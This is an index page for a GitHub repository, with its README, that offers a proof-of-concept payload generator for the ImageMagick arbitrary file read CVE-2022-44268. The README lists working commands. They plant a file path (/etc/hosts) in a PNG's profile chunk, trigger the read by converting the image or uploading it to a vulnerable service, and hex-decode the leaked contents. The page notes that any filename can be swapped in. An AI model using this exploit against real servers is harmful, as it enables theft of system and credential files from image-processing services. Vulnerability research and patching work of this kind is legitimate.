Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator
https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
Last synced: about 2 months ago
JSON representation
CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator
- Host: GitHub
- URL: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
- Owner: duc-nt
- Created: 2023-02-02T15:34:28.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-02-02T16:53:37.000Z (almost 2 years ago)
- Last Synced: 2024-08-05T17:40:07.775Z (6 months ago)
- Homepage:
- Size: 5.86 KB
- Stars: 269
- Watchers: 3
- Forks: 40
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC - CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator (Others)
- awesome-infosec - `CVE-2022-44268` - Arbitrary File Read over ImageMagick [`#1858574`](https://hackerone.com/reports/1858574) [`alternative`](https://github.com/voidz0r/CVE-2022-44268). (Bugs / Image Libs: Converters, Resizers, etc. pp)
- awesome-infosec - `CVE-2022-44268` - Arbitrary File Read over ImageMagick [`#1858574`](https://hackerone.com/reports/1858574) [`alternative`](https://github.com/voidz0r/CVE-2022-44268). (Bugs / Image Libs: Converters, Resizers, etc. pp)
README
# CVE-2022-44268 ImageMagick Arbitrary File Read PoC
### PoC for CVE-2022-44268 ImageMagick Arbitrary File Read PoC - Payload generator
### This project is created only for educational purposes and cannot be used for law violation or personal gain.
### The author of this project is not responsible for any possible harm caused by the materials of this project.
### Original finding: https://www.metabaseq.com/imagemagick-zero-days/
### Usage:
#### Installing dependencies:
`1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y`
#### Change the filename you want to read below:
`2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png`
#### Confirm everything worked perfectly
`3. $ exiv2 -pS pngout.png`
#### Trigger the PoC via convert or upload image to the vulnerable service:
`4. $ convert pngout.png gopro.png`
#### View content of file was read:
`5. $ identify -verbose gopro.png`
#### Decrypt the content:
`6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'`
## Demo
## Tested with Ubuntu 22.04 and default imagemagick installed.